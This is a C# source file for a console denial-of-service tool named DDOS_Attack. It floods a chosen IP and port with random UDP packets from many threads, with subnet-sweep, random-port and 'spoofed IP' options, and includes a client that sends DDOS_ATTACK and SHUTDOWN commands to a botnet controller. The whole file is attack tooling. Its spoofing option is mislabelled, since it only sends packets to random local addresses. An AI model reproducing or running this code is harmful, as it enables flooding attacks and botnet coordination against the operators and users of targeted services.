using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace DDOS_Attack
{
    class Program
    {
        const int BUFFER_SIZE = 1024;
        const string SPOOF_IP_RANGE = "192.168.1.";

        static string GenerateRandomIP()
        {
            Random rnd = new Random();
            int randomNum = rnd.Next(1, 254);

            string ip = SPOOF_IP_RANGE + randomNum.ToString();
            return ip;
        }

        static byte[] GenerateRandomData(int size)
        {
            byte[] data = new byte[size];
            new Random().NextBytes(data);
            return data;
        }

        static void DDOSAttack(string targetIP, int targetPort, int numConnections, bool useSubnet, bool useRandomPort, bool useSpoofedIP, int attackDuration)
        {
            // Create a ManualResetEvent to signal when the attack duration is over
            ManualResetEvent attackFinished = new ManualResetEvent(false);

            List<Thread> threads = new List<Thread>();

            for (int i = 0; i < numConnections; i++)
            {
                Thread thread = new Thread(() =>
                {
                    try
                    {
                        Random rnd = new Random();
                        using (UdpClient udpClient = new UdpClient())
                        {
                            string ipToAttack = targetIP;
                            int portToAttack = targetPort;

                            if (useSubnet)
                            {
                                ipToAttack = targetIP.Substring(0, targetIP.LastIndexOf('.') + 1) + rnd.Next(1, 254);
                            }

                            DateTime endTime = DateTime.Now.AddSeconds(attackDuration);

                            while (DateTime.Now < endTime)
                            {
                                if (useRandomPort)
                                {
                                    portToAttack = rnd.Next(1, 65535);
                                }

                                byte[] data = GenerateRandomData(BUFFER_SIZE);

                                if (useSpoofedIP)
                                {
                                    string spoofedIP = GenerateRandomIP();
                                    IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(spoofedIP), portToAttack);
                                    udpClient.Send(data, data.Length, endPoint);
                                }
                                else
                                {
                                    udpClient.Send(data, data.Length, ipToAttack, portToAttack);
                                }
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine("Error: " + ex.Message);
                    }
                    finally
                    {
                        // Signal that this thread has finished its attack
                        attackFinished.Set();
                    }
                });

                thread.Start();
                threads.Add(thread);
            }

            // Wait for all threads to signal that their attacks are finished
            foreach (Thread thread in threads)
            {
                thread.Join();
            }

            // Wait for the specified attack duration before returning
            attackFinished.WaitOne();
        }

        static void Main(string[] args)
        {
            // Set console foreground color
            Console.ForegroundColor = ConsoleColor.Green;

            // Display ASCII art
            Console.WriteLine(" ___  __    ___  ___  ________      ___    ___ ________  ________  ________     ");
            Console.WriteLine(@"|\  \|\  \ |\  \|\  \|\_____  \    |\  \  /  /|\   __  \|\   __  \|\  ___  \    ");
            Console.WriteLine(@"\ \  \/  /|\ \  \\\  \\|___/  /|   \ \  \/  / | \  \|\  \ \  \|\  \ \____   \   ");
            Console.WriteLine(@" \ \   ___  \ \  \\\  \   /  / /    \ \    / / \ \   __  \ \  \\\  \|____|\  \  ");
            Console.WriteLine(@"  \ \  \\ \  \ \  \\\  \ /  /_/__    \/  /  /   \ \  \ \  \ \  \\\  \  __\_\  \ ");
            Console.WriteLine(@"   \ \__\\ \__\ \_______\\________\__/  / /      \ \__\ \__\ \_______\|\_______\");
            Console.WriteLine(@"    \|__| \|__|\|_______|\|_______|\___/ /        \|__|\|__|\|_______|\|_______|");
            Console.WriteLine(@"                                  \|___|/                                        ");

            Console.WriteLine(); // Add a blank line for spacing

            while (true)
            {
                Console.WriteLine("DDOS Attack Menu:");
                Console.WriteLine("1. Start Attack");
                Console.WriteLine("2. Connect to Botnet");
                Console.WriteLine("3. Exit");

                Console.Write("Enter your choice: ");
                string choice = Console.ReadLine();

                switch (choice)
                {
                    case "1":
                        StartAttack();
                        break;
                    case "2":
                        ConnectToBotnet();
                        break;
                    case "3":
                        Console.WriteLine("Exiting...");
                        return;
                    default:
                        Console.WriteLine("Invalid choice. Please enter a valid option.");
                        break;
                }

                Console.WriteLine();
            }
        }

        static void StartAttack()
        {
            string targetIP = GetValidIPAddress("Enter the target IP address: ");
            int targetPort = GetValidPort("Enter the target port: ");
            int numConnections = GetValidNumber("Enter the number of connections: ");
            bool useSubnet = GetValidBoolean("Use SUBNET option (true/false): ");
            bool useRandomPort = GetValidBoolean("Use RANDOM PORT option (true/false): ");
            bool useSpoofedIP = GetValidBoolean("Use SPOOFED IP option (true/false): ");
            int attackDuration = GetValidNumber("Enter the duration of the attack in seconds: ");

            Console.WriteLine($"Starting DDOS Attack for {attackDuration} seconds...");
            DDOSAttack(targetIP, targetPort, numConnections, useSubnet, useRandomPort, useSpoofedIP, attackDuration);
        }

        static void ConnectToBotnet()
        {
            string botnetHost = GetValidHostname("Enter the botnet controller host name: ");
            string botnetIP = ResolveHostnameToIP(botnetHost);
            int botnetPort = GetValidPort("Enter the botnet controller port: ");

            try
            {
                using (TcpClient client = new TcpClient(botnetIP, botnetPort))
                using (NetworkStream stream = client.GetStream())
                {
                    Console.WriteLine("Connected to botnet controller.");

                    while (true)
                    {
                        Console.WriteLine("Botnet Command Menu:");
                        Console.WriteLine("1. Initiate DDOS Attack");
                        Console.WriteLine("2. Shutdown Botnet");
                        Console.WriteLine("3. Exit");

                        Console.Write("Enter your choice: ");
                        string choice = Console.ReadLine();

                        switch (choice)
                        {
                            case "1":
                                SendDDOSAttackCommand(stream);
                                break;
                            case "2":
                                SendShutdownCommand(stream);
                                break;
                            case "3":
                                Console.WriteLine("Exiting botnet connection...");
                                return;
                            default:
                                Console.WriteLine("Invalid choice. Please enter a valid option.");
                                break;
                        }

                        Console.WriteLine();
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error connecting to botnet: " + ex.Message);
            }
        }

        static void SendDDOSAttackCommand(NetworkStream stream)
        {
            string targetIP = GetValidIPAddress("Enter the target IP address: ");
            int targetPort = GetValidPort("Enter the target port: ");
            int numConnections = GetValidNumber("Enter the number of connections: ");
            bool useSubnet = GetValidBoolean("Use SUBNET option (true/false): ");
            bool useRandomPort = GetValidBoolean("Use RANDOM PORT option (true/false): ");
            bool useSpoofedIP = GetValidBoolean("Use SPOOFED IP option (true/false): ");
            int attackDuration = GetValidNumber("Enter the duration of the attack in seconds: ");

            string command = $"DDOS_ATTACK {targetIP} {targetPort} {numConnections} {useSubnet} {useRandomPort} {useSpoofedIP} {attackDuration}";
            SendCommand(stream, command);
        }

        static void SendShutdownCommand(NetworkStream stream)
        {
            string command = "SHUTDOWN";
            SendCommand(stream, command);
        }

        static void SendCommand(NetworkStream stream, string command)
        {
            byte[] data = Encoding.ASCII.GetBytes(command);
            stream.Write(data, 0, data.Length);
        }

        static string ResolveHostnameToIP(string hostname)
        {
            try
            {
                IPAddress[] addresses = Dns.GetHostAddresses(hostname);
                if (addresses.Length > 0)
                {
                    return addresses[0].ToString();
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error resolving hostname: " + ex.Message);
            }
            return null;
        }

        static string GetValidHostname(string prompt)
        {
            while (true)
            {
                Console.Write(prompt);
                string input = Console.ReadLine();
                if (!string.IsNullOrWhiteSpace(input))
                {
                    return input;
                }
                else
                {
                    Console.WriteLine("Hostname cannot be empty. Please enter a valid hostname.");
                }
            }
        }

        static string GetValidIPAddress(string prompt)
        {
            while (true)
            {
                Console.Write(prompt);
                string input = Console.ReadLine();

                if (IPAddress.TryParse(input, out IPAddress ipAddress))
                {
                    return ipAddress.ToString();
                }
                else
                {
                    Console.WriteLine("Invalid IP address. Please enter a valid IP address.");
                }
            }
        }

        static int GetValidPort(string prompt)
        {
            while (true)
            {
                Console.Write(prompt);
                string input = Console.ReadLine();

                if (int.TryParse(input, out int port) && port > 0 && port <= 65535)
                {
                    return port;
                }
                else
                {
                    Console.WriteLine("Invalid port. Please enter a valid integer port number between 1 and 65535.");
                }
            }
        }

        static int GetValidNumber(string prompt)
        {
            while (true)
            {
                Console.Write(prompt);
                string input = Console.ReadLine();

                if (int.TryParse(input, out int number) && number > 0)
                {
                    return number;
                }
                else
                {
                    Console.WriteLine("Invalid number. Please enter a valid positive integer.");
                }
            }
        }

        static bool GetValidBoolean(string prompt)
        {
            while (true)
            {
                Console.Write(prompt);
                string input = Console.ReadLine();

                if (bool.TryParse(input, out bool result))
                {
                    return result;
                }
                else
                {
                    Console.WriteLine("Invalid input. Please enter 'true' or 'false'.");
                }
            }
        }
    }
}
